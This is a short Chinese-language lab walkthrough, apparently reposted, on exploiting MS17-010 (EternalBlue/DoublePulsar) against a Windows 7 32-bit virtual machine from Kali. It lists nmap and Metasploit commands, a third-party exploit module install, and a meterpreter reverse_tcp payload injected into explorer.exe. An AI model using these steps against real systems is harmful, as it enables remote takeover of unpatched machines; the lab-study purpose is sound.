利用MS17-010滲透win7(32位)


環境

靶機: win7 32位 ip 192.168.206.129

攻擊機: kali  ip 192.168.206.128

運行環境:VMware

工具: FinalShell

信息收集

nmap -sS -sV -Pn 192.168.206.129

 發現端口445可以進行測試

進入msf6命令

msfconsole

 檢測系統是否有漏洞

先使用use auxiliary/scanner/smb/smb_ms17_010模塊進行分析

use auxiliary/scanner/smb/smb_ms17_010

 顯示系統存在漏洞系統為win7 32位

下載模塊

kali沒有32位的利用模塊 下載地址 將下載下來的Eternalblue-Doublepulsar-Metasploit-master的名字改為Eternalblue-Doublepulsar-Metasploit並將改完名后的整個目錄復制到root目錄下(需要解壓2次,把最后一次解壓名改為Eternalblue-Doublepulsar-Metasploit 並放到/root目錄下)

將eternalblue_doublepulsar.rb 拷貝到/usr/share/metasploit-framework/modules/exploits/windows/smb目錄下

cp eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb

 安裝框架

 wine -h

發現找不到再運行

dpkg --add-architecture i386 && apt-get update && apt-get install wine32

最后測試

使用use exploit/windows/smb/eternalblue_doublepulsar進行測試

use exploit/windows/smb/eternalblue_doublepulsar

設置攻擊模塊

set payload windows/meterpreter/reverse_tcp

 繼續設置

set processinject explorer.exe

 測試完成

 

參考

https://blog.csdn.net/qq_41617034/article/details/91051614

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM